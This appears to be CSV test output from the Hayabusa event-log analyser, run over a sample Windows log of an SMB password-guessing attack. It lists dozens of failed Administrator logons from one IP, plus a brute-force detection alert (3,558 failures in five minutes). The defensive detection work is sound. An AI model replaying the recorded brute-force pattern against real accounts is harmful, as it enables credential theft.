+2016-09-20 01:50:06.513 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gC4ymsKbxVGScMgY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:06.513 +09:00,-,-,medium,CredAccess,Password Guessing Attack,[condition] count() by IpAddress >= 5 in timeframe [result] count:3558 IpAddress:192.168.198.149 timeframe:5m,rules/hayabusa/default/alerts/Security/4625_BruteForce_PasswordGuessingDetect.yml,-
+2016-09-20 01:50:06.588 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: f2q1tdAUlxHGfGH6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:06.637 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3EPNzcwy7tOAADWx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:06.680 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AbwsMP10Rs4h1Wl1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:06.725 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EEcdqcpqsxQ4RgPx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:06.773 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ngdtRwzXXhAlRxGY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:06.816 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BbCFZw5qQgU7rQ9W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:06.869 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SXr7lA3MkV6xK36f | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:06.909 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tVFs1kR0AuOutnuI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:06.977 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PkeEabFrDLsBVcXi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GH7dTevmTKZo46Tq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.052 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: l2E8JmrfaCj5AjSF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.091 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: N4FLUvawWPVqdLaD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.136 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KN0EeUzxSZy5l7J4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.169 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: l8FjH0QHqromIYWf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.217 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fhlF37S1wNupiX5O | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.262 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j19XhmSXK526I8kf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.297 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IRcppJXDNNfKuvdc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.343 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E0FoGAIAK2FV3zCJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.393 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uYWIk76XIksgN3sE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.444 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3FEop7o3SOolNvKs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.484 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cMGEM3ql9uov7zCP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.520 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EFPUA4pUPaLrkr1I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.551 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b7IeJU89jxitz407 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.590 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Wqj9nXRaDpwCJZO3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.631 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bl0d61v2Ux7cNv4r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.663 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8LxTa5lyutrIB2cd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.684 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LPCy11e3YxcCloSH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.720 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Mj07WKc4aQqPC0Te | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.752 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: T2M3v4TsQul5R4sj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I67uBcH52tgLzhVB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.835 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2hsth68FDJ4F10H6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.929 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aDoHrfWlaWZ5GbWV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.972 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uliC5Wd7uZR3fIBc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Unknown Reason,User: Administrator | Type: 3 | Computer: Xhg4hg4XDFaXsJRe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-UnknownError.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.042 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Unknown Reason,User: Administrator | Type: 3 | Computer: ZrSGxwUyV6gCUPeb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-UnknownError.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.179 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XUBgTr05x3djEYdM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.219 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 40PhGU4ZXu7uihop | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.335 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1DJ9r72hXZH9rEkb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.397 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: khy2BeyBb9wq00f7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.462 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1cDckicL7IMrO7OQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.513 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dEEkvfVd3FCap6fa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.545 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JGFSyHQ0ZNWofxzE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.576 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ItOZqZSDTrdWpkbp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.611 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NhNdf5lHfrHKSCXq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.646 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xg05F6tdf3kR9kdP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.693 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 70rRbaC6L6SzT15q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.735 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HnJyN8wF21ff2L1e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.769 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MUZHZJMQznj6GBqg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.804 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: P9h52ZKMbXLuFvUV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.839 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n95RJvcQnFrAG2iX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.883 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xI23nmysFlr1pvVf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.916 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nVsjcTxDdZbzkmMx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.955 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mMuWatQuNBh9UKdR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.992 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BfC3JZ3awqFDNQbm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.028 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 337h8PHN6Axi0iaY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.071 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qGQpWOuzgETfxTgJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.108 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oFjlyMAJMI2zIC8w | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.144 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7exAVz3PlzJQ6Wcw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.183 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RuYihjQpt76foAW3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.219 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OlPm2vRh9EHN9J6n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.255 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n9jDy3NDDPe7XgyW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.291 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AtGxqEKOoP6W3w0Y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.336 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BLqYztXwV80UBez1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.364 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C0yki1dEFZrnMLs2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.420 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jbE2z1W1wQgoTDso | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.455 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IJmZFXFxiLuWWkMC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.500 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x9EPwprgXSJNUFfg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.544 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h0ZjYxZ8K5m5F1vo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.587 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xSw7OjDv8ldqbm5T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.631 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mk0BAdOI210HwPhX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.686 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wSwWz57Kvl2XJVUR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.720 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DLcfSrHT5bSsNnuQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
